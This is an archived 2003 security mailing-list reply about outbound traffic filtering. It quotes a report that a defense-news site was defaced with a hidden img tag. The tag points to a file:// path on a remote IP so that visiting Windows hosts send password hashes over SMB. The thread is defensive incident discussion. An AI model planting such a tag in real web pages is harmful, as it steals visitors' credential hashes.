RE: Importance of outbound traffic filtering

From: Jack Lyons (jack.lyonsat_private)
Date: Tue Jul 22 2003 - 09:38:47 PDT

Next message: Harlan Carvey: "Re: First time security issue."

Previous message: Stark, Vernon L.: "RE: Importance of outbound traffic filtering"
Maybe in reply to: Stark, Vernon L.: "Importance of outbound traffic filtering"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I block those ports and others outbound, but it would only stop DDOS attack
against people who left those ports open inbound - correct?

> -----Original Message-----
> From: Stark, Vernon L. [mailto:Vern.Starkat_private]
> Sent: Friday, July 18, 2003 10:13 AM
> To: 'incidentsat_private'
> Subject: Importance of outbound traffic filtering
> 
> 	For the third time since May 5th, a site which provides news about
> department of defense issues has apparently been defaced.  The hack is
> described in Ed Skoudis's excellent book entitled "Counter Hack" (pages
> 289-290).  The hack we noticed today is a web page with content of the
> form
> 
> <img src=file://korean_ip_address/test.jpg height=0 width=0>
> 
> 	If outbound traffic to TCP ports 139 and 445 is NOT blocked, Windows
> hosts will attempt to send password hashes to the remote host.  Hosts may
> attempt to contact the remote host on other ports (e.g. 80) as well.  This
> clearly illustrates the importance of outbound traffic filtering.
> 
> Vern Stark, GCIA, GSEC
> 
> JHU/APL
> 
> --------------------------------------------------------------------------
> --
> Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
> world's premier technical IT security event! 10 tracks, 15 training
> sessions,
> 1,800 delegates from 30 nations including all of the top experts, from
> CSO's to
> "underground" security specialists.  See for yourself what the buzz is
> about!
> Early-bird registration ends July 3.  This event will sell out.
> www.blackhat.com
> --------------------------------------------------------------------------
> --


This email and its contents may be confidential.  If it is and you are not
the intended recipient, please do not disclose or use the information within
this email or its attachments.  If you have received this email in error,
please delete it immediately.  Thank you.



---------------------------------------------------------------------------
----------------------------------------------------------------------------

Next message: Harlan Carvey: "Re: First time security issue."
Previous message: Stark, Vernon L.: "RE: Importance of outbound traffic filtering"
Maybe in reply to: Stark, Vernon L.: "Importance of outbound traffic filtering"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 22 2003 - 13:37:30 PDT